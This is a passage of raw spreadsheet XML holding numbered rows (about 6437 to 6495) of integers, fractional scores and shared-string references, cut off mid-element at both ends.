      <c r="C6437">
        <v>4993</v>
      </c>
      <c r="D6437">
        <v>3</v>
      </c>
      <c r="E6437">
        <v>0.65160000324249268</v>
      </c>
      <c r="F6437" t="s">
        <v>10120</v>
      </c>
      <c r="G6437" t="s">
        <v>12731</v>
      </c>
      <c r="H6437" t="s">
        <v>12703</v>
      </c>
    </row>
    <row r="6438" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6438" s="1">
        <v>6436</v>
      </c>
      <c r="B6438">
        <v>5171</v>
      </c>
      <c r="C6438">
        <v>5171</v>
      </c>
      <c r="D6438">
        <v>3</v>
      </c>
      <c r="E6438">
        <v>0.57969999313354492</v>
      </c>
      <c r="F6438" t="s">
        <v>10120</v>
      </c>
      <c r="G6438" t="s">
        <v>12732</v>
      </c>
      <c r="H6438" t="s">
        <v>12733</v>
      </c>
    </row>
    <row r="6439" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6439" s="1">
        <v>6437</v>
      </c>
      <c r="B6439">
        <v>178</v>
      </c>
      <c r="C6439">
        <v>178</v>
      </c>
      <c r="D6439">
        <v>3</v>
      </c>
      <c r="E6439">
        <v>0.57649999856948853</v>
      </c>
      <c r="F6439" t="s">
        <v>10120</v>
      </c>
      <c r="G6439" t="s">
        <v>12734</v>
      </c>
      <c r="H6439" t="s">
        <v>12735</v>
      </c>
    </row>
    <row r="6440" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6440" s="1">
        <v>6438</v>
      </c>
      <c r="B6440">
        <v>210</v>
      </c>
      <c r="C6440">
        <v>210</v>
      </c>
      <c r="D6440">
        <v>3</v>
      </c>
      <c r="E6440">
        <v>0.97259998321533203</v>
      </c>
      <c r="F6440" t="s">
        <v>10120</v>
      </c>
      <c r="G6440" t="s">
        <v>12736</v>
      </c>
      <c r="H6440" t="s">
        <v>12737</v>
      </c>
    </row>
    <row r="6441" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6441" s="1">
        <v>6439</v>
      </c>
      <c r="B6441">
        <v>5086</v>
      </c>
      <c r="C6441">
        <v>5086</v>
      </c>
      <c r="D6441">
        <v>3</v>
      </c>
      <c r="E6441">
        <v>0.63499999046325684</v>
      </c>
      <c r="F6441" t="s">
        <v>10120</v>
      </c>
      <c r="G6441" t="s">
        <v>12738</v>
      </c>
      <c r="H6441" t="s">
        <v>12739</v>
      </c>
    </row>
    <row r="6442" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6442" s="1">
        <v>6440</v>
      </c>
      <c r="B6442">
        <v>5138</v>
      </c>
      <c r="C6442">
        <v>5138</v>
      </c>
      <c r="D6442">
        <v>3</v>
      </c>
      <c r="E6442">
        <v>0.75379997491836548</v>
      </c>
      <c r="F6442" t="s">
        <v>10120</v>
      </c>
      <c r="G6442" t="s">
        <v>12740</v>
      </c>
      <c r="H6442" t="s">
        <v>12741</v>
      </c>
    </row>
    <row r="6443" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6443" s="1">
        <v>6441</v>
      </c>
      <c r="B6443">
        <v>181</v>
      </c>
      <c r="C6443">
        <v>181</v>
      </c>
      <c r="D6443">
        <v>3</v>
      </c>
      <c r="E6443">
        <v>0.35330000519752502</v>
      </c>
      <c r="F6443" t="s">
        <v>10120</v>
      </c>
      <c r="G6443" t="s">
        <v>12742</v>
      </c>
      <c r="H6443" t="s">
        <v>12743</v>
      </c>
    </row>
    <row r="6444" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6444" s="1">
        <v>6442</v>
      </c>
      <c r="B6444">
        <v>5113</v>
      </c>
      <c r="C6444">
        <v>5113</v>
      </c>
      <c r="D6444">
        <v>3</v>
      </c>
      <c r="E6444">
        <v>0.99830001592636108</v>
      </c>
      <c r="F6444" t="s">
        <v>10120</v>
      </c>
      <c r="G6444" t="s">
        <v>12744</v>
      </c>
      <c r="H6444" t="s">
        <v>12745</v>
      </c>
    </row>
    <row r="6445" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6445" s="1">
        <v>6443</v>
      </c>
      <c r="B6445">
        <v>5114</v>
      </c>
      <c r="C6445">
        <v>5114</v>
      </c>
      <c r="D6445">
        <v>3</v>
      </c>
      <c r="E6445">
        <v>0.99580001831054688</v>
      </c>
      <c r="F6445" t="s">
        <v>10120</v>
      </c>
      <c r="G6445" t="s">
        <v>12746</v>
      </c>
      <c r="H6445" t="s">
        <v>12747</v>
      </c>
    </row>
    <row r="6446" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6446" s="1">
        <v>6444</v>
      </c>
      <c r="B6446">
        <v>189</v>
      </c>
      <c r="C6446">
        <v>189</v>
      </c>
      <c r="D6446">
        <v>3</v>
      </c>
      <c r="E6446">
        <v>0.53229999542236328</v>
      </c>
      <c r="F6446" t="s">
        <v>10120</v>
      </c>
      <c r="G6446" t="s">
        <v>12748</v>
      </c>
      <c r="H6446" t="s">
        <v>12749</v>
      </c>
    </row>
    <row r="6447" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6447" s="1">
        <v>6445</v>
      </c>
      <c r="B6447">
        <v>206</v>
      </c>
      <c r="C6447">
        <v>206</v>
      </c>
      <c r="D6447">
        <v>3</v>
      </c>
      <c r="E6447">
        <v>0.74580001831054688</v>
      </c>
      <c r="F6447" t="s">
        <v>10120</v>
      </c>
      <c r="G6447" t="s">
        <v>12750</v>
      </c>
      <c r="H6447" t="s">
        <v>12751</v>
      </c>
    </row>
    <row r="6448" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6448" s="1">
        <v>6446</v>
      </c>
      <c r="B6448">
        <v>191</v>
      </c>
      <c r="C6448">
        <v>191</v>
      </c>
      <c r="D6448">
        <v>3</v>
      </c>
      <c r="E6448">
        <v>0.9976000189781189</v>
      </c>
      <c r="F6448" t="s">
        <v>10120</v>
      </c>
      <c r="G6448" t="s">
        <v>12752</v>
      </c>
      <c r="H6448" t="s">
        <v>12753</v>
      </c>
    </row>
    <row r="6449" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6449" s="1">
        <v>6447</v>
      </c>
      <c r="B6449">
        <v>5129</v>
      </c>
      <c r="C6449">
        <v>5129</v>
      </c>
      <c r="D6449">
        <v>3</v>
      </c>
      <c r="E6449">
        <v>0.8410000205039978</v>
      </c>
      <c r="F6449" t="s">
        <v>10120</v>
      </c>
      <c r="G6449" t="s">
        <v>12754</v>
      </c>
      <c r="H6449" t="s">
        <v>12755</v>
      </c>
    </row>
    <row r="6450" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6450" s="1">
        <v>6448</v>
      </c>
      <c r="B6450">
        <v>5117</v>
      </c>
      <c r="C6450">
        <v>5117</v>
      </c>
      <c r="D6450">
        <v>3</v>
      </c>
      <c r="E6450">
        <v>0.48629999160766602</v>
      </c>
      <c r="F6450" t="s">
        <v>10120</v>
      </c>
      <c r="G6450" t="s">
        <v>12756</v>
      </c>
      <c r="H6450" t="s">
        <v>12757</v>
      </c>
    </row>
    <row r="6451" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6451" s="1">
        <v>6449</v>
      </c>
      <c r="B6451">
        <v>5118</v>
      </c>
      <c r="C6451">
        <v>5118</v>
      </c>
      <c r="D6451">
        <v>3</v>
      </c>
      <c r="E6451">
        <v>0.99860000610351563</v>
      </c>
      <c r="F6451" t="s">
        <v>10120</v>
      </c>
      <c r="G6451" t="s">
        <v>12758</v>
      </c>
      <c r="H6451" t="s">
        <v>12759</v>
      </c>
    </row>
    <row r="6452" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6452" s="1">
        <v>6450</v>
      </c>
      <c r="B6452">
        <v>5119</v>
      </c>
      <c r="C6452">
        <v>5119</v>
      </c>
      <c r="D6452">
        <v>3</v>
      </c>
      <c r="E6452">
        <v>0.50209999084472656</v>
      </c>
      <c r="F6452" t="s">
        <v>10120</v>
      </c>
      <c r="G6452" t="s">
        <v>12760</v>
      </c>
      <c r="H6452" t="s">
        <v>12761</v>
      </c>
    </row>
    <row r="6453" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6453" s="1">
        <v>6451</v>
      </c>
      <c r="B6453">
        <v>5120</v>
      </c>
      <c r="C6453">
        <v>5120</v>
      </c>
      <c r="D6453">
        <v>3</v>
      </c>
      <c r="E6453">
        <v>0.67269998788833618</v>
      </c>
      <c r="F6453" t="s">
        <v>10120</v>
      </c>
      <c r="G6453" t="s">
        <v>12762</v>
      </c>
      <c r="H6453" t="s">
        <v>12763</v>
      </c>
    </row>
    <row r="6454" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6454" s="1">
        <v>6452</v>
      </c>
      <c r="B6454">
        <v>5121</v>
      </c>
      <c r="C6454">
        <v>5121</v>
      </c>
      <c r="D6454">
        <v>3</v>
      </c>
      <c r="E6454">
        <v>0.56330001354217529</v>
      </c>
      <c r="F6454" t="s">
        <v>10120</v>
      </c>
      <c r="G6454" t="s">
        <v>12764</v>
      </c>
      <c r="H6454" t="s">
        <v>12765</v>
      </c>
    </row>
    <row r="6455" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6455" s="1">
        <v>6453</v>
      </c>
      <c r="B6455">
        <v>5122</v>
      </c>
      <c r="C6455">
        <v>5122</v>
      </c>
      <c r="D6455">
        <v>3</v>
      </c>
      <c r="E6455">
        <v>0.8400999903678894</v>
      </c>
      <c r="F6455" t="s">
        <v>10120</v>
      </c>
      <c r="G6455" t="s">
        <v>12766</v>
      </c>
      <c r="H6455" t="s">
        <v>12767</v>
      </c>
    </row>
    <row r="6456" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6456" s="1">
        <v>6454</v>
      </c>
      <c r="B6456">
        <v>205</v>
      </c>
      <c r="C6456">
        <v>205</v>
      </c>
      <c r="D6456">
        <v>3</v>
      </c>
      <c r="E6456">
        <v>0.78070002794265747</v>
      </c>
      <c r="F6456" t="s">
        <v>10120</v>
      </c>
      <c r="G6456" t="s">
        <v>12768</v>
      </c>
      <c r="H6456" t="s">
        <v>12769</v>
      </c>
    </row>
    <row r="6457" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6457" s="1">
        <v>6455</v>
      </c>
      <c r="B6457">
        <v>5139</v>
      </c>
      <c r="C6457">
        <v>5139</v>
      </c>
      <c r="D6457">
        <v>3</v>
      </c>
      <c r="E6457">
        <v>0.84249997138977051</v>
      </c>
      <c r="F6457" t="s">
        <v>10120</v>
      </c>
      <c r="G6457" t="s">
        <v>12770</v>
      </c>
      <c r="H6457" t="s">
        <v>12771</v>
      </c>
    </row>
    <row r="6458" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6458" s="1">
        <v>6456</v>
      </c>
      <c r="B6458">
        <v>4957</v>
      </c>
      <c r="C6458">
        <v>4957</v>
      </c>
      <c r="D6458">
        <v>3</v>
      </c>
      <c r="E6458">
        <v>0.65030002593994141</v>
      </c>
      <c r="F6458" t="s">
        <v>10120</v>
      </c>
      <c r="G6458" t="s">
        <v>12772</v>
      </c>
      <c r="H6458" t="s">
        <v>12773</v>
      </c>
    </row>
    <row r="6459" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6459" s="1">
        <v>6457</v>
      </c>
      <c r="B6459">
        <v>5148</v>
      </c>
      <c r="C6459">
        <v>5148</v>
      </c>
      <c r="D6459">
        <v>3</v>
      </c>
      <c r="E6459">
        <v>0.75300002098083496</v>
      </c>
      <c r="F6459" t="s">
        <v>10120</v>
      </c>
      <c r="G6459" t="s">
        <v>12774</v>
      </c>
      <c r="H6459" t="s">
        <v>12775</v>
      </c>
    </row>
    <row r="6460" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6460" s="1">
        <v>6458</v>
      </c>
      <c r="B6460">
        <v>5149</v>
      </c>
      <c r="C6460">
        <v>5149</v>
      </c>
      <c r="D6460">
        <v>3</v>
      </c>
      <c r="E6460">
        <v>0.89259999990463257</v>
      </c>
      <c r="F6460" t="s">
        <v>10120</v>
      </c>
      <c r="G6460" t="s">
        <v>12776</v>
      </c>
      <c r="H6460" t="s">
        <v>12777</v>
      </c>
    </row>
    <row r="6461" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6461" s="1">
        <v>6459</v>
      </c>
      <c r="B6461">
        <v>209</v>
      </c>
      <c r="C6461">
        <v>209</v>
      </c>
      <c r="D6461">
        <v>3</v>
      </c>
      <c r="E6461">
        <v>0.99409997463226318</v>
      </c>
      <c r="F6461" t="s">
        <v>10120</v>
      </c>
      <c r="G6461" t="s">
        <v>12778</v>
      </c>
      <c r="H6461" t="s">
        <v>12779</v>
      </c>
    </row>
    <row r="6462" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6462" s="1">
        <v>6460</v>
      </c>
      <c r="B6462">
        <v>5098</v>
      </c>
      <c r="C6462">
        <v>5098</v>
      </c>
      <c r="D6462">
        <v>3</v>
      </c>
      <c r="E6462">
        <v>0.767799973487854</v>
      </c>
      <c r="F6462" t="s">
        <v>10120</v>
      </c>
      <c r="G6462" t="s">
        <v>12780</v>
      </c>
      <c r="H6462" t="s">
        <v>12781</v>
      </c>
    </row>
    <row r="6463" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6463" s="1">
        <v>6461</v>
      </c>
      <c r="B6463">
        <v>5099</v>
      </c>
      <c r="C6463">
        <v>5099</v>
      </c>
      <c r="D6463">
        <v>3</v>
      </c>
      <c r="E6463">
        <v>0.65109997987747192</v>
      </c>
      <c r="F6463" t="s">
        <v>10120</v>
      </c>
      <c r="G6463" t="s">
        <v>12782</v>
      </c>
      <c r="H6463" t="s">
        <v>12783</v>
      </c>
    </row>
    <row r="6464" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6464" s="1">
        <v>6462</v>
      </c>
      <c r="B6464">
        <v>208</v>
      </c>
      <c r="C6464">
        <v>208</v>
      </c>
      <c r="D6464">
        <v>3</v>
      </c>
      <c r="E6464">
        <v>0.88700002431869507</v>
      </c>
      <c r="F6464" t="s">
        <v>10120</v>
      </c>
      <c r="G6464" t="s">
        <v>12784</v>
      </c>
      <c r="H6464" t="s">
        <v>12785</v>
      </c>
    </row>
    <row r="6465" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6465" s="1">
        <v>6463</v>
      </c>
      <c r="B6465">
        <v>5104</v>
      </c>
      <c r="C6465">
        <v>5104</v>
      </c>
      <c r="D6465">
        <v>3</v>
      </c>
      <c r="E6465">
        <v>0.7807999849319458</v>
      </c>
      <c r="F6465" t="s">
        <v>10120</v>
      </c>
      <c r="G6465" t="s">
        <v>12786</v>
      </c>
      <c r="H6465" t="s">
        <v>12787</v>
      </c>
    </row>
    <row r="6466" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6466" s="1">
        <v>6464</v>
      </c>
      <c r="B6466">
        <v>5105</v>
      </c>
      <c r="C6466">
        <v>5105</v>
      </c>
      <c r="D6466">
        <v>3</v>
      </c>
      <c r="E6466">
        <v>0.99659997224807739</v>
      </c>
      <c r="F6466" t="s">
        <v>10120</v>
      </c>
      <c r="G6466" t="s">
        <v>12788</v>
      </c>
      <c r="H6466" t="s">
        <v>12789</v>
      </c>
    </row>
    <row r="6467" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6467" s="1">
        <v>6465</v>
      </c>
      <c r="B6467">
        <v>5169</v>
      </c>
      <c r="C6467">
        <v>5169</v>
      </c>
      <c r="D6467">
        <v>3</v>
      </c>
      <c r="E6467">
        <v>0.72109997272491455</v>
      </c>
      <c r="F6467" t="s">
        <v>10120</v>
      </c>
      <c r="G6467" t="s">
        <v>12790</v>
      </c>
      <c r="H6467" t="s">
        <v>12791</v>
      </c>
    </row>
    <row r="6468" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6468" s="1">
        <v>6466</v>
      </c>
      <c r="B6468">
        <v>5158</v>
      </c>
      <c r="C6468">
        <v>5158</v>
      </c>
      <c r="D6468">
        <v>3</v>
      </c>
      <c r="E6468">
        <v>0.9189000129699707</v>
      </c>
      <c r="F6468" t="s">
        <v>10120</v>
      </c>
      <c r="G6468" t="s">
        <v>12792</v>
      </c>
      <c r="H6468" t="s">
        <v>12793</v>
      </c>
    </row>
    <row r="6469" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6469" s="1">
        <v>6467</v>
      </c>
      <c r="B6469">
        <v>180</v>
      </c>
      <c r="C6469">
        <v>180</v>
      </c>
      <c r="D6469">
        <v>3</v>
      </c>
      <c r="E6469">
        <v>0.40290001034736628</v>
      </c>
      <c r="F6469" t="s">
        <v>10120</v>
      </c>
      <c r="G6469" t="s">
        <v>12794</v>
      </c>
      <c r="H6469" t="s">
        <v>12795</v>
      </c>
    </row>
    <row r="6470" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6470" s="1">
        <v>6468</v>
      </c>
      <c r="B6470">
        <v>5106</v>
      </c>
      <c r="C6470">
        <v>5106</v>
      </c>
      <c r="D6470">
        <v>3</v>
      </c>
      <c r="E6470">
        <v>0.87569999694824219</v>
      </c>
      <c r="F6470" t="s">
        <v>10120</v>
      </c>
      <c r="G6470" t="s">
        <v>12796</v>
      </c>
      <c r="H6470" t="s">
        <v>12797</v>
      </c>
    </row>
    <row r="6471" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6471" s="1">
        <v>6469</v>
      </c>
      <c r="B6471">
        <v>5107</v>
      </c>
      <c r="C6471">
        <v>5107</v>
      </c>
      <c r="D6471">
        <v>3</v>
      </c>
      <c r="E6471">
        <v>0.99870002269744873</v>
      </c>
      <c r="F6471" t="s">
        <v>10120</v>
      </c>
      <c r="G6471" t="s">
        <v>12798</v>
      </c>
      <c r="H6471" t="s">
        <v>12799</v>
      </c>
    </row>
    <row r="6472" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6472" s="1">
        <v>6470</v>
      </c>
      <c r="B6472">
        <v>5154</v>
      </c>
      <c r="C6472">
        <v>5154</v>
      </c>
      <c r="D6472">
        <v>3</v>
      </c>
      <c r="E6472">
        <v>0.74650001525878906</v>
      </c>
      <c r="F6472" t="s">
        <v>10120</v>
      </c>
      <c r="G6472" t="s">
        <v>12800</v>
      </c>
      <c r="H6472" t="s">
        <v>12801</v>
      </c>
    </row>
    <row r="6473" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6473" s="1">
        <v>6471</v>
      </c>
      <c r="B6473">
        <v>207</v>
      </c>
      <c r="C6473">
        <v>207</v>
      </c>
      <c r="D6473">
        <v>3</v>
      </c>
      <c r="E6473">
        <v>0.54040002822875977</v>
      </c>
      <c r="F6473" t="s">
        <v>10120</v>
      </c>
      <c r="G6473" t="s">
        <v>12802</v>
      </c>
      <c r="H6473" t="s">
        <v>12803</v>
      </c>
    </row>
    <row r="6474" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6474" s="1">
        <v>6472</v>
      </c>
      <c r="B6474">
        <v>5110</v>
      </c>
      <c r="C6474">
        <v>5110</v>
      </c>
      <c r="D6474">
        <v>3</v>
      </c>
      <c r="E6474">
        <v>0.97829997539520264</v>
      </c>
      <c r="F6474" t="s">
        <v>10120</v>
      </c>
      <c r="G6474" t="s">
        <v>12804</v>
      </c>
      <c r="H6474" t="s">
        <v>12805</v>
      </c>
    </row>
    <row r="6475" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6475" s="1">
        <v>6473</v>
      </c>
      <c r="B6475">
        <v>5111</v>
      </c>
      <c r="C6475">
        <v>5111</v>
      </c>
      <c r="D6475">
        <v>3</v>
      </c>
      <c r="E6475">
        <v>0.69169998168945313</v>
      </c>
      <c r="F6475" t="s">
        <v>10120</v>
      </c>
      <c r="G6475" t="s">
        <v>12806</v>
      </c>
      <c r="H6475" t="s">
        <v>12807</v>
      </c>
    </row>
    <row r="6476" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6476" s="1">
        <v>6474</v>
      </c>
      <c r="B6476">
        <v>5112</v>
      </c>
      <c r="C6476">
        <v>5112</v>
      </c>
      <c r="D6476">
        <v>3</v>
      </c>
      <c r="E6476">
        <v>0.79960000514984131</v>
      </c>
      <c r="F6476" t="s">
        <v>10120</v>
      </c>
      <c r="G6476" t="s">
        <v>12808</v>
      </c>
      <c r="H6476" t="s">
        <v>12809</v>
      </c>
    </row>
    <row r="6477" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6477" s="1">
        <v>6475</v>
      </c>
      <c r="B6477">
        <v>4488</v>
      </c>
      <c r="C6477">
        <v>4488</v>
      </c>
      <c r="D6477">
        <v>3</v>
      </c>
      <c r="E6477">
        <v>0.97409999370574951</v>
      </c>
      <c r="F6477" t="s">
        <v>10120</v>
      </c>
      <c r="G6477" t="s">
        <v>12810</v>
      </c>
      <c r="H6477" t="s">
        <v>12811</v>
      </c>
    </row>
    <row r="6478" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6478" s="1">
        <v>6476</v>
      </c>
      <c r="B6478">
        <v>249</v>
      </c>
      <c r="C6478">
        <v>249</v>
      </c>
      <c r="D6478">
        <v>3</v>
      </c>
      <c r="E6478">
        <v>0.59160000085830688</v>
      </c>
      <c r="F6478" t="s">
        <v>10120</v>
      </c>
      <c r="G6478" t="s">
        <v>12812</v>
      </c>
      <c r="H6478" t="s">
        <v>12813</v>
      </c>
    </row>
    <row r="6479" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6479" s="1">
        <v>6477</v>
      </c>
      <c r="B6479">
        <v>256</v>
      </c>
      <c r="C6479">
        <v>256</v>
      </c>
      <c r="D6479">
        <v>3</v>
      </c>
      <c r="E6479">
        <v>0.95410001277923584</v>
      </c>
      <c r="F6479" t="s">
        <v>10120</v>
      </c>
      <c r="G6479" t="s">
        <v>12814</v>
      </c>
      <c r="H6479" t="s">
        <v>12815</v>
      </c>
    </row>
    <row r="6480" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6480" s="1">
        <v>6478</v>
      </c>
      <c r="B6480">
        <v>287</v>
      </c>
      <c r="C6480">
        <v>287</v>
      </c>
      <c r="D6480">
        <v>3</v>
      </c>
      <c r="E6480">
        <v>0.69679999351501465</v>
      </c>
      <c r="F6480" t="s">
        <v>10120</v>
      </c>
      <c r="G6480" t="s">
        <v>12816</v>
      </c>
      <c r="H6480" t="s">
        <v>12817</v>
      </c>
    </row>
    <row r="6481" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6481" s="1">
        <v>6479</v>
      </c>
      <c r="B6481">
        <v>4847</v>
      </c>
      <c r="C6481">
        <v>4847</v>
      </c>
      <c r="D6481">
        <v>3</v>
      </c>
      <c r="E6481">
        <v>0.59229999780654907</v>
      </c>
      <c r="F6481" t="s">
        <v>10120</v>
      </c>
      <c r="G6481" t="s">
        <v>12818</v>
      </c>
      <c r="H6481" t="s">
        <v>12819</v>
      </c>
    </row>
    <row r="6482" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6482" s="1">
        <v>6480</v>
      </c>
      <c r="B6482">
        <v>4849</v>
      </c>
      <c r="C6482">
        <v>4849</v>
      </c>
      <c r="D6482">
        <v>3</v>
      </c>
      <c r="E6482">
        <v>0.66269999742507935</v>
      </c>
      <c r="F6482" t="s">
        <v>10120</v>
      </c>
      <c r="G6482" t="s">
        <v>12820</v>
      </c>
      <c r="H6482" t="s">
        <v>12821</v>
      </c>
    </row>
    <row r="6483" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6483" s="1">
        <v>6481</v>
      </c>
      <c r="B6483">
        <v>4851</v>
      </c>
      <c r="C6483">
        <v>4851</v>
      </c>
      <c r="D6483">
        <v>3</v>
      </c>
      <c r="E6483">
        <v>0.71939998865127563</v>
      </c>
      <c r="F6483" t="s">
        <v>10120</v>
      </c>
      <c r="G6483" t="s">
        <v>12822</v>
      </c>
      <c r="H6483" t="s">
        <v>12823</v>
      </c>
    </row>
    <row r="6484" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6484" s="1">
        <v>6482</v>
      </c>
      <c r="B6484">
        <v>4855</v>
      </c>
      <c r="C6484">
        <v>4855</v>
      </c>
      <c r="D6484">
        <v>3</v>
      </c>
      <c r="E6484">
        <v>0.78270000219345093</v>
      </c>
      <c r="F6484" t="s">
        <v>10120</v>
      </c>
      <c r="G6484" t="s">
        <v>12824</v>
      </c>
      <c r="H6484" t="s">
        <v>12825</v>
      </c>
    </row>
    <row r="6485" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6485" s="1">
        <v>6483</v>
      </c>
      <c r="B6485">
        <v>137</v>
      </c>
      <c r="C6485">
        <v>137</v>
      </c>
      <c r="D6485">
        <v>3</v>
      </c>
      <c r="E6485">
        <v>0.69880002737045288</v>
      </c>
      <c r="F6485" t="s">
        <v>10120</v>
      </c>
      <c r="G6485" t="s">
        <v>12826</v>
      </c>
      <c r="H6485" t="s">
        <v>12827</v>
      </c>
    </row>
    <row r="6486" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6486" s="1">
        <v>6484</v>
      </c>
      <c r="B6486">
        <v>290</v>
      </c>
      <c r="C6486">
        <v>290</v>
      </c>
      <c r="D6486">
        <v>3</v>
      </c>
      <c r="E6486">
        <v>0.47459998726844788</v>
      </c>
      <c r="F6486" t="s">
        <v>10120</v>
      </c>
      <c r="G6486" t="s">
        <v>12828</v>
      </c>
      <c r="H6486" t="s">
        <v>12829</v>
      </c>
    </row>
    <row r="6487" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6487" s="1">
        <v>6485</v>
      </c>
      <c r="B6487">
        <v>4857</v>
      </c>
      <c r="C6487">
        <v>4857</v>
      </c>
      <c r="D6487">
        <v>3</v>
      </c>
      <c r="E6487">
        <v>0.97339999675750732</v>
      </c>
      <c r="F6487" t="s">
        <v>10120</v>
      </c>
      <c r="G6487" t="s">
        <v>12830</v>
      </c>
      <c r="H6487" t="s">
        <v>12831</v>
      </c>
    </row>
    <row r="6488" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6488" s="1">
        <v>6486</v>
      </c>
      <c r="B6488">
        <v>5254</v>
      </c>
      <c r="C6488">
        <v>5254</v>
      </c>
      <c r="D6488">
        <v>3</v>
      </c>
      <c r="E6488">
        <v>0.86580002307891846</v>
      </c>
      <c r="F6488" t="s">
        <v>10120</v>
      </c>
      <c r="G6488" t="s">
        <v>12832</v>
      </c>
      <c r="H6488" t="s">
        <v>12833</v>
      </c>
    </row>
    <row r="6489" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6489" s="1">
        <v>6487</v>
      </c>
      <c r="B6489">
        <v>4862</v>
      </c>
      <c r="C6489">
        <v>4862</v>
      </c>
      <c r="D6489">
        <v>3</v>
      </c>
      <c r="E6489">
        <v>0.75019997358322144</v>
      </c>
      <c r="F6489" t="s">
        <v>10120</v>
      </c>
      <c r="G6489" t="s">
        <v>12834</v>
      </c>
      <c r="H6489" t="s">
        <v>12835</v>
      </c>
    </row>
    <row r="6490" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6490" s="1">
        <v>6488</v>
      </c>
      <c r="B6490">
        <v>138</v>
      </c>
      <c r="C6490">
        <v>138</v>
      </c>
      <c r="D6490">
        <v>3</v>
      </c>
      <c r="E6490">
        <v>0.73729997873306274</v>
      </c>
      <c r="F6490" t="s">
        <v>10120</v>
      </c>
      <c r="G6490" t="s">
        <v>12836</v>
      </c>
      <c r="H6490" t="s">
        <v>12837</v>
      </c>
    </row>
    <row r="6491" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6491" s="1">
        <v>6489</v>
      </c>
      <c r="B6491">
        <v>5250</v>
      </c>
      <c r="C6491">
        <v>5250</v>
      </c>
      <c r="D6491">
        <v>3</v>
      </c>
      <c r="E6491">
        <v>0.77139997482299805</v>
      </c>
      <c r="F6491" t="s">
        <v>10120</v>
      </c>
      <c r="G6491" t="s">
        <v>12838</v>
      </c>
      <c r="H6491" t="s">
        <v>12839</v>
      </c>
    </row>
    <row r="6492" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6492" s="1">
        <v>6490</v>
      </c>
      <c r="B6492">
        <v>141</v>
      </c>
      <c r="C6492">
        <v>141</v>
      </c>
      <c r="D6492">
        <v>3</v>
      </c>
      <c r="E6492">
        <v>0.48710000514984131</v>
      </c>
      <c r="F6492" t="s">
        <v>10120</v>
      </c>
      <c r="G6492" t="s">
        <v>12840</v>
      </c>
      <c r="H6492" t="s">
        <v>12841</v>
      </c>
    </row>
    <row r="6493" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6493" s="1">
        <v>6491</v>
      </c>
      <c r="B6493">
        <v>4865</v>
      </c>
      <c r="C6493">
        <v>4865</v>
      </c>
      <c r="D6493">
        <v>3</v>
      </c>
      <c r="E6493">
        <v>0.83649998903274536</v>
      </c>
      <c r="F6493" t="s">
        <v>10120</v>
      </c>
      <c r="G6493" t="s">
        <v>12842</v>
      </c>
      <c r="H6493" t="s">
        <v>12843</v>
      </c>
    </row>
    <row r="6494" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6494" s="1">
        <v>6492</v>
      </c>
      <c r="B6494">
        <v>4859</v>
      </c>
      <c r="C6494">
        <v>4859</v>
      </c>
      <c r="D6494">
        <v>3</v>
      </c>
      <c r="E6494">
        <v>0.88550001382827759</v>
      </c>
      <c r="F6494" t="s">
        <v>10120</v>
      </c>
      <c r="G6494" t="s">
        <v>12844</v>
      </c>
      <c r="H6494" t="s">
        <v>12845</v>
      </c>
    </row>
    <row r="6495" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6495" s="1">
        <v>6493</v>
      </c>
      <c r="B6495">
        <v>5257</v>
      </c>
      <c r="C6495">
        <v>5257</v>
      </c>
      <c r="D6495">
        <v>3</v>
      </c>
      <c r="E6495">
        <v>0.81690001487731934</v>
      </c>
      <c r="F6495" t="s">
        <v>10120</v>
      </c>
      <c r="G6495" t="s">
